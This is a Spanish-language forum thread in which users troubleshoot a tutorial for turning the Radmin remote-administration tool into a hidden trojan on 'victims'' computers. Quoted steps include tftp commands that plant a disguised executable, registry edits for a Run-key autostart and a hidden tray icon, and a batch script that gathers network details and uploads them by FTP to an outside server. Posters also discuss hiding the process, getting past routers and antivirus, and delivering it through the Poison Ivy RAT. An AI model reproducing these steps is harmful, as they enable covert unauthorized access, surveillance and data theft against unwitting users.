(Bueno ahora me estoy fijando y parece mas qe solo devuelve la shell la primera vez que reinicia las otras lla no.
Bueno
a ver si me ayudan
le mande el radmin a la otra persona, esta lo ejecuto, y lo unico que me aparece son los stats en el netcat, y tengo control sobre su maquina solo que por netcat...
alguien sabe que tengo que hacer despues de estO?
porque el RADMIN hasta ahora no pude usarlo
graciass y chau :)
hola alguien ha hecho un exe con todo lo del radmin ?
q si lo de la shell etc? haber si me lo puede mandar o darme el link, otra cosa no hay forma de q cuando la victima ejectute el exe se le ponga un no-ip.com automaticamente y q uno lo pueda editar?
gracias
Bueno he probado el radmin con ordenadores sin router y me va bien pero no he podido con ordenadores con router lla que no permiten conexiones entrantes.Por eso queria saber si hay alguna manera de que el radmin funcione contra un ordenador con router.
Gracias muhcas gracias.
Citarlla
Ya
Ya
Ya
Ya
Ya
Ya
Ya
Seguramente sea porque el router, al actuar de firewall, tiene el puerto cerrado. Abre el puerto del Radmin en el router y prueba a ver.
Saludos!
Alguien sabe como abrir el puerto del router teniendo una shell.
Gracias .
Pues puedes hacerle desde la shell un telnet a la IP de enlace, normalmente 192.168.1.1. Y desde ahi pues ya está, egun el modelo del router las opciones cambian, investigalas y ya esta...
Saludos!
oye q bien! ahora con esta ayuda tengo control sobre todo el cyber, y aunq en mi casa hay un PC, puedo controlarlo desde el cyber gracias...
Salu2
Chrono17
Wenas
Citar7.-Subir archivos via tftp
una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:
Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado
Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre
Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)
ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....
Una cuenta remota hay q con seguir antes? :'( alguna forma facil de conseguirla? la ip xxxxxxxxx seria la mia?
o se hace dsd la ventana dl ms2 q teniamos abierta antes... en tal caso m dice q tftp\udp servicio desconocido
yo solo puedo hacerlo ocn Netcat con Radmin no puedo.
He echo todos los pasos escritos en el manual de troyanizar Radmin y no me funciona...como veo algunos de ustedes tampoco les va.. :( Quien lo haga funcionar bien que lo diga! :P
Saludos.
como obtengo una cuenta remota? :'(
especifica mas...
Si te refieres con Netcat, LEE el manual que hay o los manuales..que hay en este foro...no se molestan en leer..lean 1º, luego las dudas que tengan preguntenlan...
Saludos
sargantana....no me mandes privados diciendome que tienes que hacer pa conseguir shell con Netcat
PONLO AQUI
Y te vuelvo a repetir...LEETE EL MANUAL QUE HAY EN ESTE FORO SOBRE NETCAT, leiendote eso te quedará mas claro todo...ok?¿?¿
bajate esto http://personal.telefonica.terra.es/web/alexb/manus/Shell.con.Netcat.by.zhyzura.zip
tamadre... por mas que lo intento me sale: can`t connect to the server....
segui paso a paso los datos
Pon todos los pasos que as seguido ok?
Saludos
uf... aflin me funco la porqueria xD me puse mi ip y se volvio loco.. pero sirvio xD
jejeje
Es una maravilla Netcat :P
Saludos!
bueno funciona solo con mi ip con el resto sale que no se puede... es ilogicooooooo ayudenme!!
Seguramente usarás router, y seguramente no tendrás el puerto mapeado a tu máquina ¿verdad?
Accede a la configuración de tu Router, busca la NAT (SUA) y redirecciona el puerto a tu máquina. Para saber la IP puerta de enlace (la IP del router) y la IP de tu máquina basta con que hagas un IPconfig en la consola de MS-DOS y te fijes.
Una vez hayas redireccionado el puerto a tu máquina creo que no habrá problema.
Saludos!
en todo casco.... mi router no tiene esa opcion....
bueno redirecciono el puerto de la victima al mio? o mi puerto al mio con el ip de la victima??? ??? ??? ??? ??? ???
A ver..si quieres hacer un "reverse shell", osea que la Pc victima se conecte a ti, tendras que entrar a la configuracion de tu Router, por Telnet, o por http...e ir a NAT, si no aparece el Menu de Nat, te bajas un manual de tu Router, y miras como puedes abrir puertos, una vez sepas como se abren los puertos, lo abres pero para la direccion de tu IP DE RED, no a la direccion Pública, y si por el contrario, quieres hacer una shell directa, osea tu conectas a tu victima, si tu Victima tiene Router, tendrías que entrar en su Router y abrirle ese puerto..ay ya mas dificil.
Saludos
Yo he usado Radmin hace tiempos pero por lo que visto estan perfeccionando cada ves as esta onda, 8) yo lo que quisira aprender ha usar es NetCat 8) 8) ;D :)
Poniendo en práctica lo de "Troyanizando Radmin 2.1" y luego de leer todas las dudas y contestaciones siguientes al tutorial, me surge una duda, que por mucho que revolví en el foro, no encontre la info para sacarme la duda (valga la redundancia). Según dicen, y si no entendí mal, se instala el netcat con la finalidad de lograr la cónsola y así poder ejecutar los archivos descargados a la máquina víctima, entre otras cosas.El netcat por medio de la reverse sheel se autoconecta a la pc atacante aunque haya firewall o router de por medio, osea que se no sería problema.Mi duda surge al momento de conectarse con el radmin, es decir, suponiendo que la máquina tenga un firewall se soluciona por medio de un mata procesos, pero y si esta detras de un router?;según leí por ahi en el foro, una de las maneras es entrando a la configuracion del router por telnet, pero y si el modelo de router no permite entrar a la configuración del mismo por medio de telnet?pregunto, por que mi router marca Trendnet de la única manera (al menos que yo tenga conciencia) que permite configurarlo es via http. Pero la duda especifica es. Suponiendo que tengo que acceder al router remoto, y no permite conexion de telnet, como se hace para configurarlo via http en una maquina víctima remota?. Espero no haber armado mucha confusión, y haber sido lo suficientemente explícito. Agradezco las respuestas :)
Supongo que entonces podrías ponerle como puerto de conexión el 80 o el 110, pero nunca lo he probado así que no sé si funcionaría.
Saludos!
Si no te entendido mal, es si no se puede configurar desde Telnet remotamente, configurarlo por http, pues si el puerto 80 está abierto, tan solo tendrías que poner en tu explorador de Internet, http://IP
Es igual que cuando accedes a tu Router a través de http.
Y hay te saldrá contraseña y password del Router, y entras, por Http, resulta más fácil configurar.
Saludos
Muchas Gracias Carlipus, me sacaste la duda ;D
De nada!
Saludos!
Hola a todos y gracias por acernos la vida asi de simple jeje, pero.... como podria hacer para q el r_server aparezca como aplicacion de sistema y no como aplicacion de usuario en el administrador de tareas por q asi solo le dan matar proceso y chau conexión, y tambien como hacer para q no aparezca en el msconfig el inicio de nc y del radmin server camuflageado, si alguien tiene alguna sugerencia o algun material para ilustrarme en este asunto por favor publicarlo aqui asi no sea yo solamente el beneficiado si no todos lo lectores de este foro ok.
Weno un saludo a todos y hasta la proxima.
xdd
Pues no he leido el hilo, pero si has seguido los pasos, el radmin se te habra instalado como servicio en la makina en cuestion, lo que quiere decir que en el proximo reinicio sera lanzado como system..
Salu2
P.D.: Anelkaos (Ocultar Remote Administrator 2.1 de la lista de servicios). Rootkit, se que se puede cambiar el nombre pues alguno me encontrao pero a saber, tocando el registro imagino que se podra igual .. pero amos .. root, y adios proceso, servicio y puerto .. XDD
Para saltear los routers/gateways ,lo mejor es usar VNC en "listen mode" donde el puerto "escucha" es el nuestro y no el de la victima , por ende nos vamos a poder conectar donde queramos.
Otra opcion es el Remote Anything , el cual mediante una herramienta que se llama "directory server" nos va actualizando todas las victimas que se van infectando , de la misma forma que el vnc , en mode "listen" donde la conexion la establecen ellos hacia nosotros en el momento que ejecutan el server. yo lo uso , y no necesito reverse shell , netcat , ni nada para saltear fierewalls , es MUY recomendable.
K onda;
Oigan hize el tutorial al pie de la letra...Ya la victima tiene guardado todos los arhivos...Pero al intenar conectarme con ella Me dice k el Password es incorrecto...Y cheque el .bat y todo esta bien para k el password sea 123456 k pasara?
Saludos
Ibiza-Tdi... 8)
hola a todo el mundo, gran tutorial por cierto, pero alguien sabe como quitar una proteccion que tiene el messenger, que borra el archivo automáticamente?, Gracias
Buenas a todos,
he estado intentando troyanizar el radmin 2.2 , programando y compilando un archivo en C q ejecute unas instrucciones en cmd.exe .
El caso es q ésta nueva versión de radmin no incluye la opción de introducir la pass durante la instalación por línea de comandos.
Probando en una LAN he conseguido todo menos colocar un password imprescindible para conectarme al remoto.
Saben de qué manera podría incluir la pass en la instalación desde la línea de comandos y, si es posible, activar la opción HIDE para q desaparezca de la barra de herramientas ?
Gracias por anticipado y un saludo.
PD: Gracias a todos los q dia a dia colaboran en ésta web que tanto nos enseñan a principiantes informáticos como yo, facilitandonos en todos los casos la manera de aprender y comprender todo el entorno.
Buenas he probado el siguiente codigo de la pagina 2 y me sale un error que no logro resolver.
@echo off
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo firewer >>C:\WINDOWS\system32\Win32el.dll
echo mipassword >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll ftp.usuarios.lycos.es
Me devuelve lo siguiente: (el pass y el usuario q pongo son correctos)
Conectado a ftp.usuarios.lycos.es.
220 212.78.204.234 FTP server ready
Usuario (ftp.usuarios.lycos.es:(none)):
331 Password required for firewer.
530 Login incorrect.
Error al iniciar la sesión.
ftp> put C:\WINDOWS\system32\win32ip.dll victima.txt
530 Please login with USER and PASS
530 Please login with USER and PASS
ftp> QUIT
221 Goodbye.
Ai algo mal?
Por cierto esto:
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
Solo da la ip privada del pc, como se hace para la ip publica?
Citar[Oigan hize el tutorial al pie de la letra...Ya la victima tiene guardado todos los arhivos...Pero al intenar conectarme con ella Me dice k el Password es incorrecto...Y cheque el .bat y todo esta bien para k el password sea 123456 k pasara?
/quote]
el password no tenia k tener por lo menos 8 caracteres?
bueno... me da algo subir un post tan antiguo, pero es k tengo una duda. Donde **** esta la dll AdmDLL.dll? la he buscado por todo el ordenador y no la encuentro :S
gracias
en la misma carpeta donde se encuentra instalado el radmin ahi siempre esta
pues... o yo estoy ciego o no esta :S prk no la veo. tampoco esta oculta. puede ser k esto pase prk tengo la version 2.2 trial? no tengo la versioncompleta :P
si es muy posible bajate la 2.1 del emule q esta muy bien y sino contacta conmigo y te lo paso
no encuentro el radmin al emule T_T creo k esa dll no me aparece prk tengo la version demo :P voy a seguir buscando, pero si puede ser pasame algun link desde donde me pueda bajar el 2.1 ;)
Instale el radmin2.1 para troyanizarlo, la pequeña duda que tengo es que EN TEORIA debería funcionar si, ejecuto el r_server.exe, haciendo doble click sobre el icono, luego se coloca en el tray icon a la escucha en el puerto 4890 (por ejemplo), luego en el cliente del radmin para la conexion con el server coloco el puerto, pero en lugar de colocar una ip interna (192.168.xxx.xxx) o mi loopip (127.0.0.1) colocó la ip externa 256.xxx.xxx.xxx, y sin ningun servicio de antivirus o firewall corriendo (previamente cerrados con el comando net stop "servicio") debería conectarse el cliente al servidor, en teoría si el server esta abriendo el puerto x y este está a la escucha y el cliente se conecta con el mismo puerto pero con la ip externa, debería funcionar, y aún así sin ningun firewall corriendo...
Pero nunca logro conectarme, siempre me sale "can´t connect to server", ahora bien, si coloco un ip interna si funciona.....
PD: ya llevo bastante tiempo tratando de troyanizar el ramin2.1 pero solo lo hago dentro de una LAN y mi intención es hacerlo fuera de ésta.
Hace tiempo que utilizo el Remote Anything y me ha dado buenos resultados.
Me fije en lo que posteo LEPROX sobre el SERVER DIRECTORY y la verdad no puedo hacerlo funcionar le pediria a Leprox a alguno si me pasa un tuto sobre "la conexion inversa" de esta herramienta
Hola yo no puedo seguir el manual porque ya me da error al principio, en este punto:
2.-Abrimos una shell, para eso nos vamos a inicio---- ejecutar---cmd.exe o cmommand.com segun sea el caso y nos dirigimos al directorio donde instalamos radmin
Citar
c:\archivos de programa\radmin\
y ejecutamos r_server.exe /setup
Citar
c:\archivos de programa\radmin\r_server.exe /setup
nos aparecera una ventana en la que podremos configurarlo a nuestro gusto.
A mi me dice "C:\Archivos" no se reconoce como un comando interno o externo, programa o archivos por lotes ejecutable.
Asi que no puedo seguri por que no me abre nada, decir que mi sitema operatico es el Windows xp sp2, haber si orienta alguien, gracias y salu2
uuffffff te quedo arechisimo sige haci :o
perdon la pregunta tan super polla pero es = con el radmin 2.2???? :huh:
Porque siempre cuando sale un tuto para troyanizar un administrador remoto es tan dificil conseguir la version que se troyaniza??? no eh podido conseguir la version 2.1 y con el tuto de vnc me es imposible conseguir la version 3.3.2! >:( >:( si me pueden mandar unlink o algo porfavor.....saludos...
aver si les facilito un poco lo de las descargas:
http://512.iespana.es/radmin
necesito saber donde se hace el bat para la configurar de radmin en el cmd o en el block de notas :( ayuda respondande a este mail zx_hbc@hotmail.com se hacer todo lo demas con ipackertools pero lo del netcat y "el bot" no se ... ayuda ...ayuda :¬¬
El bat se hace como más te guste.... si sabes hacer el bat da igual como lo hagas... la manera más sencilla es con el notepad
salu2
como mas me guste... graxias pero lo hago con el notepad (bloc de notas) yeso lo guardo ?? .. que despues dice que ahi que agregarlo
..doce abrimos el bat y se van a cargar todas las entradas ..eso no mas ...y algo el netcat lo baje solo se usa el netcat.exe se agrega a ipacker?? pofas necesito ayuda de eso ... :( :-\ ;)
algo no se si es estupido pero para hacer el bat solo ahi que escribir eso en el notepad ? y listo necesito saber eso nada mas porfas soy novato en curso ... ;D
siiiiiiiiiiiiii , guardalo como .bat y listo
hola a tod@s.
Soy nuevo en esto, he conseguido hacer un server con poiso y mandarselo a 1 victima k ahora se me conecta, y quiero meterle a la victima que tengo en el poison 2.3.0, el radmin, pero sin que se entere que se lo meto.
Ya k con el poison NO puedo ver en tiempò real lo k pasa en el scritorio.
Si creo el .bat , o el exe del radmin troyanizado, podria meterselo atrabes del poison ?????
Como deberia hacerlo, para que no vea moverse carpetas raton etc ??????
muchas gracias
un saludo
PD alguien sve donde se puede encontrar a dia de hoy el IPacker Tool.
o en su caso alguno k haga lo mismo ????
Mira no esta muy claro la pregunta de colocar la ip externa para ejecutar el radmin, pero si tu server lo tienes instalado en la maquina donde te conecta al internet osea la ip externa y te conecta con otra maquina k de igual manera se conecta con una direccion ip externa cliente no tendrías problemas, el problema es de k si uno de de esas makinas pertence dentro de una lan y pasa por un proxy, entonces tienes problemas, pork pasa de una maquina aunque no tenga un conrtafuegos, la solucion seria troyanzar el proxy pa k te de enlace,,,, suerte....por cierto eso no te funaria mucho pork las ips son dinamicas solamente k hagas un domino gratis...
miren muchachones, ayudemne, lo k pasa que en este foro me parece no podr crear nuevos temas y me aparece como blokeado k pasa, algo hice mal para merecer esto????? talvez no sea el lugar correcto pero no me keda de otro
cuando le doy en generar el autoejecutable me sale que falta un archivo run dll, ese que pedo hice algo mal????? casi lo termino solo me falta ese paso. ::)
Cita de: pepe_piocha en 3 Octubre 2007, 12:07 PM
cuando le doy en generar el autoejecutable me sale que falta un archivo run dll, ese que pedo hice algo mal????? casi lo termino solo me falta ese paso. ::)
Te falta el AdmDll.dll que está en la carpeta del Radmin :¬¬
Bueno tengo un problemita perecido al anterior, segui todos los pasos, pero al querer generar me da un error me dice:
Error: No se encuentra el archivo runload.dll. No se puede comenzar la operacion sin esta archivo.
Pero si esta cargado el archivo AdmDll.dll
no se donde esta el error, por otro lado tengo un detalle, genere el archivo *.bat y al cargarlo en la pantalla principal de IPacker me aparece Comandos (0) , no se si sea ahi donde este el error, si alguien me puede ayudar, se lo agradezco.
buenas, retomando el tema que es bastante interesante, no he podido conectar el netcat ya que estoy como ante 2 routers entonces, mi duda es si se puede el net cat saltearse estos. entonces lo q hago es congiruar el netcat al puerto 6000 y el radmin al 4899
enontces cuando trato de entrar al radmin no me deja . el mismo error de que no deja conectar. en el foro he leido que hay que abrir los puertos, pero no tengo acceso a los routers.
alguna solucion gracias
disculpen no entiendo el comando tftp por favor si alguien me lo puede explicar se los Agradecería, he tratado de subir los archivos al pc remoto pero me manda tiempo de espera agotado.
ola a todo el mundo ...perdonar por la pregunta pero .... eo estoy siguendo todo los pasos para troyanizar el radmin 2.1 y resulta que al final me lo esta creando pero ... PERO resulta que esta detectado como virus asta mi antivirus que es avast ... y lo tengo desactualizado me lo detecta como virus .... perdonar a todos pero llevo 3 dias y 3 noches para crealo y todo me sale siemmpre igual.... aver si ustedes me podeis sacar de la duda por favor e echo el .bat e cambiado todo igual que en el tutorial .... ... porva necesito ayudsa
Después de bastantes años, decidí hacerlo haber que tal ya que soy un completo n00b en esto... así que si pregunto cosas coherentes... LO SIENTO
Y mi duda es la siguiente:
Todo lo que copio a continuación entra dentro del .bat?
Citar6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.
codigo:
Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
solo sustituyan los valores por los suyos.
7.-Subir archivos via tftp
una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:
Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado
Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre
Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)
Por otro lado, cuando pone tftp -i xxx.xxx.xxx.xxx que se supone que debo poner en dichas xxx? Ojalá pudieran ayudarme después de tantos años... muchisimas gracias de antemano!! :)